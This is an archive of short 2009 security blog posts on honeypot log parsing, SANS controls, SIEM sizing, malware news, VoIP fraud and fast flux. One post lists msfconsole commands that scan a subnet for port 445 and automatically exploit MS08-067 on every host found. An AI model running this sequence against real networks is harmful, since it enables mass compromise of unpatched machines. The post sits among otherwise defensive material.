Saturday, February 28, 2009

What To Do If Your Web Site Has Been Hacked by Phishers

This is a high-level document by the APWG that explains the steps you should take if your web server is used in a phishing attack. It also gives you an idea of how to identify phishing attacks against web sites, using techniques such as traffic monitoring, file system inspection, server configuration inspection, and event logging.

Thursday, February 26, 2009

Control Based Security

SANS released a draft paper on the 20 most important controls for effective cyber defence. The list is very well defined and makes a lot of sense...
  1. Inventory of Authorized and Unauthorized Hardware.
  2. Inventory of Authorized and Unauthorized Software.
  3. Secure Configurations for Hardware and Software on Laptops, Workstations, and Servers.
  4. Secure Configurations of Network Devices Such as Firewalls and Routers.
  5. Boundary Defense
  6. Maintenance and Analysis of Complete Security Audit Logs
  7. Application Software Security
  8. Controlled Use of Administrative Privileges
  9. Controlled Access Based On Need to Know
  10. Continuous Vulnerability Testing and Remediation
  11. Dormant Account Monitoring and Control
  12. Anti-Malware Defenses
  13. Limitation and Control of Ports, Protocols and Services
  14. Wireless Device Control
  15. Data Leakage Protection
  16. Secure Network Engineering
  17. Red Team Exercises
  18. Incident Response Capability
  19. Data Recovery Capability
  20. Security Skills Assessment and Training to Fill Gaps

Monday, February 23, 2009

Importing Nepenthes honeypot logs into Mysql

This is a quick and dirty way of importing the Nepenthes submissions log into a MySQL database, then using PHP to generate some statistics.

The first part is to prepare the logs:
cat sub |grep http://|sed 's/\[//'|sed 's/\]//'|sed -e 's/->/ /g' | sed 's/http:/ http/g' | sed 's/:/ /3g' |sed 's/\// /g' |sed 's/T/ /'|sed 's/ /,/2g'|sed 's/,,,/,/g'|sed 's/,,/,/g' >db_http

cat sub |sed 's/\[//'|sed 's/\]//'|grep link://|sed -e 's/->/ /g' | sed 's/http:/ /g' | sed 's/:/ /3g' |sed 's/\/\// /' |sed 's/\// /'|sed 's/T/ /'|sed 's/ /,/2g'|sed 's/,,,/,/g'|sed 's/,,/,/g' >db_link

cat sub |grep tftp://|sed 's/\[//'|sed 's/\]//'|sed -e 's/->/ /g' | sed 's/:/ /3g' |sed 's/\// /g' |sed 's/T/ /'|sed 's/ /,/2g'|sed 's/,,,/,/g'|sed 's/,,/,/g' >db_tftp

cat sub |grep ' ftp'|sed 's/\[//'|sed 's/\]//'|sed 's/\// /g' |sed 's/T/ /'|sed -e 's/->/ /g'|sed 's/:/ /3g'| sed 's/@/ /g'|awk '{print $1,$2,$3,$4,$5,$8,$9,$10,$11}'|sed 's/ /,/2g'|sed 's/,,,/,/g'|sed 's/,,/,/g' >db_ftp

The above 4 commands parse the submissions log and generate 4 files (db_http, db_ftp, db_tftp, and db_link) that are ready to be imported into the database. Each line carries the following fields (date and time stay space-separated so they load into a single datetime column):
"date time, attacker_ip, sensor, protocol, malware_srv, malware_srv_port, file, md5"
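As a sanity check on the parsing, the whole transformation for an HTTP submission can also be sketched as a single awk pass. The sample input line below is hypothetical; verify it against your own submissions log format before relying on it.

```shell
#!/bin/sh
# Hypothetical sample line -- check against your own Nepenthes log format.
line='[2009-02-28T12:34:56] 10.0.0.1 -> sensor1 http://203.0.113.7:80/x.exe 0a1b2c3d'

echo "$line" | awk '{
  gsub(/\[|\]/, "", $1); sub(/T/, " ", $1)  # "[date]T[time]" -> "date time"
  url = $5
  sub(/:\/\//, " ", url)                    # split off the protocol
  gsub(/[:\/]/, " ", url)                   # split host, port, and file name
  split(url, u, " ")
  # date time, attacker_ip, sensor, protocol, malware_srv, port, file, md5
  printf "%s,%s,%s,%s,%s,%s,%s,%s\n", $1, $2, $4, u[1], u[2], u[3], u[4], $6
}'
# -> 2009-02-28 12:34:56,10.0.0.1,sensor1,http,203.0.113.7,80,x.exe,0a1b2c3d
```

The output matches the column order of the submissions table below, so the same LOAD DATA statement applies.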

Now it is easy to create a database with the above fields and import the 4 generated files into it.

#mysql --user=root --password=password

CREATE DATABASE IF NOT EXISTS nepenthes;
USE nepenthes;

CREATE TABLE submissions (
date datetime NOT NULL default '0000-00-00 00:00:00',
attacker_ip varchar(80) NOT NULL default '',
sensor varchar(80) NOT NULL default '',
protocol varchar(80) NOT NULL default '',
malware_srv varchar(80) NOT NULL default '',
malware_srv_port varchar(80) NOT NULL default '',
file varchar(80) NOT NULL,
md5 varchar(80) NOT NULL
);

ALTER TABLE submissions ADD `uniqueid` VARCHAR(32) NOT NULL default '';
ALTER TABLE submissions ADD INDEX ( `attacker_ip` );
ALTER TABLE submissions ADD INDEX ( `sensor` );
ALTER TABLE submissions ADD INDEX ( `malware_srv` );
ALTER TABLE submissions ADD INDEX ( `md5` );

LOAD DATA INFILE '/usr/local/src/nepenthes/db_http' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';
LOAD DATA INFILE '/usr/local/src/nepenthes/db_tftp' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';
LOAD DATA INFILE '/usr/local/src/nepenthes/db_ftp' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';
LOAD DATA INFILE '/usr/local/src/nepenthes/db_link' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';

Please note: change the 4 file locations above according to where your files actually are.

Now you will have the logs loaded into your database.
The next step is to automate this process. I will not go through the automation in detail, but it should be easy with a daily cron job on the Nepenthes sensor that stops Nepenthes, renames the submissions log file, and sends the renamed file to a remote reporting server, where the import above runs from another daily cron job.
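The sensor-side cron job could look something like the sketch below. The paths, the init script name, and the reporting host (reports.example.com) are all assumptions, not Nepenthes defaults you can rely on; adjust them to your setup.

```shell
#!/bin/sh
# Daily rotation job for the Nepenthes sensor (a sketch; paths, service name,
# and reporting host are assumptions -- adjust to your environment).
LOGDIR=${LOGDIR:-/var/log/nepenthes}
STAMP=$(date +%Y%m%d)

rotate() {
    /etc/init.d/nepenthes stop                                   # stop the daemon
    mv "$LOGDIR/logged_submissions" "$LOGDIR/submissions.$STAMP" # rename the log
    /etc/init.d/nepenthes start                                  # resume capturing
    # ship the renamed file to the reporting server for the nightly import
    scp "$LOGDIR/submissions.$STAMP" reports.example.com:/usr/local/src/nepenthes/sub
}

# Invoke rotate from a daily crontab entry, e.g.:
#   0 1 * * * /usr/local/sbin/nepenthes-rotate.sh
```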

The second part is to generate web reports with GeoIP location. I have used MaxMind's free GeoIP Country database: install the MaxMind Lite database locally, then use the sample code below. It is just a proof of concept; you should spend some time on it to make it user friendly...

Sunday, February 22, 2009

New worm on Nokia mobiles

Symbian-based mobiles running S60 3rd Edition are targeted by a new worm. The worm propagates by sending SMS messages to the contacts in the infected mobile's phone book; each SMS contains a URL that, once clicked, installs the malware, which then sends personal information to a remote server on the internet.
The worm is called SymbOS/Yxes.A!worm, and its only aim is to collect data about users. It seems this is just the beginning of a large mobile spam attack.

This is not the first malware on Symbian-based devices; the platform seems to be getting more attention from the bad guys.

Two Critical Vulnerabilities

MS09-002 is another critical Internet Explorer vulnerability that allows remote code execution; a patch is available from Microsoft.

CVE-2009-0658 is another PDF vulnerability that allows code execution. There is no patch available yet; however, most Anti-Virus vendors should have updated signatures.

Reports are showing that hackers are now actively exploiting these 2 critical vulnerabilities, so once again everyone should:
- Patch your systems
- Make sure that your Anti-Virus is updated.

Sunday, February 15, 2009

Metasploit for Dummies

Metasploit is giving out a very simple step-by-step sample for exploiting the latest MS08-067 vulnerability from the msfconsole.

The steps below will scan hosts on subnet AAA.BBB.CCC.0/24 for open port 445 and launch the exploit against the active hosts.

msf > load db_sqlite3
msf > db_create
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
msf > db_autopwn -e -p -b -m ms08_067

Then view the opened sessions by:
msf > sessions -l
msf > sessions -i 1

For writing shellcode, check Generating Shellcode Using Metasploit

Thursday, February 12, 2009

Finding Alternate Data Streams

Alternate Data Streams can be used to hide malware, besides their legitimate uses.
AlternateStreamView is a small free tool that scans an entire NTFS drive for all ADS.

Sunday, February 8, 2009

Security Information Event Management (SIEM)

If you are considering implementing Security Information Event Management (SIEM), SANS has produced a very good whitepaper on some design issues, with a sample case study.

The paper is about benchmarking the SIEM; however, it does not cover all requirements for such a project, such as integration with other systems, transport mechanisms, ports and protocols, change control, usability, storage type, integration with physical security, reporting capabilities, work-flow management, false-positive rate, etc.

Here are some points to consider:
- Do we need all log data? How much data can the network and collection tools actually handle under load?
- What is the threshold before the network bottlenecks and/or the SIEM is considered unusable?
- The true value of a SIEM is MTTR (Mean Time To Remediate), which shows the ability to handle incident response.
- Calculate the EPS (Events per Second) under normal conditions and at peak load.
- List all devices, taking future changes into consideration.

The benchmarking process was done on a case with 750 users, 5 offices, 6 subnets, 5 databases, a central data center, 4 firewalls, 6 IPSs, 6 switches, and 6 routers.

- It is unlikely that all devices will send logs at their maximum rate at the same time.
- Sending logs over TCP is much better than UDP: UDP packets started dropping at 3,000 EPS, while TCP could maintain 100,000 EPS.

Calculating the storage is also important: at 20,000 EPS, 8 hours of an ongoing incident will produce 576 million records; using a 300-byte average record size, the storage needed is over 170 GB of data. The storage can differ from the local DB to the archiving DB, with encryption requirements.
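The paper's storage figure checks out with quick shell arithmetic:

```shell
#!/bin/sh
# Back-of-the-envelope storage estimate: 20,000 EPS sustained for 8 hours,
# at an average event record size of 300 bytes.
EPS=20000
HOURS=8
AVG_BYTES=300

RECORDS=$((EPS * 3600 * HOURS))   # events logged during the incident
BYTES=$((RECORDS * AVG_BYTES))
echo "$RECORDS records, $((BYTES / 1000000000)) GB"
# -> 576000000 records, 172 GB
```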

Saturday, February 7, 2009

SANS 2008 Salary & Certification Survey

It is an interesting survey, here are some points to consider:

- Digital Forensics, Penetration Testing, and Intrusion Detection are the most interesting topics to be learned in 2009

- The highest planned technology implementations in 2009:
       Configuration Management
       Storage Security
       Wireless Security
       Incident Management

- The highest "NOT in 2009" technologies:
     Identity and Access Management
     Database Security
- Out of the top 15 certifications, 11 are GIAC certificates.

Wednesday, February 4, 2009

VoIP Fraud for Telco Providers

A presentation by British Telecom about fraud; the interesting part is bypassing international call fees by terminating the calls on the internet.
While this is not new, one of the new ideas in this area is using WiMAX to extend the internet link by a few kilometers to avoid physical detection. Another idea is to use GSM SIM cards across borders, specifically using a SIM from country A within country B, which avoids the legal problems of VoIP termination.

Next-generation fraud is about Residential Gateway (Triple Play or VoIP) abuse, WiFi reselling, botnets, and DDoS.

The presentation is one year old, but it is still relevant.

Monday, February 2, 2009

Security by Video

Lots of security tutorial videos are now available online, covering topics like socket programming basics, IPv6, cryptography, cracking WEP, ...
The list is growing; go check it.

Sunday, February 1, 2009

Fast Flux, ICANN Working Group Report

ICANN just released an initial report about Fast Flux for public comment.

The ICANN Fast Flux working group is trying to gather information that might help in initiating a formal policy development process or in exploring other means to address this issue, in addition to exploring the possibility of developing a Fast Flux Data Reporting System (FFDRS).

Fast Flux characteristics:
- Multiple IPs per NS, spanning multiple ASNs
- Frequent NS changes (Double Fast-Flux)
- IPs located within consumer broadband blocks
- Domain name age is short
- Fraudulent WHOIS records
- Usage of "nginx" proxy on infected machines

- Motherships are the controlling element of a fast-flux network, exactly as C&C servers are to botnets
- Motherships are hidden behind front-end fast-flux proxy nodes

Proxy Redirection:
- Fluxed hosts are typically proxies that redirect traffic to the attacker's actual content
- Adds a 2nd layer of obfuscation to fast flux

Legitimate use of Fast Flux:
Fast Flux techniques using short DNS TTLs are used for:
- Load balancing high capacity systems
- Rapid update to propagate changes quickly
- Free-speech groups and dynamic DNS services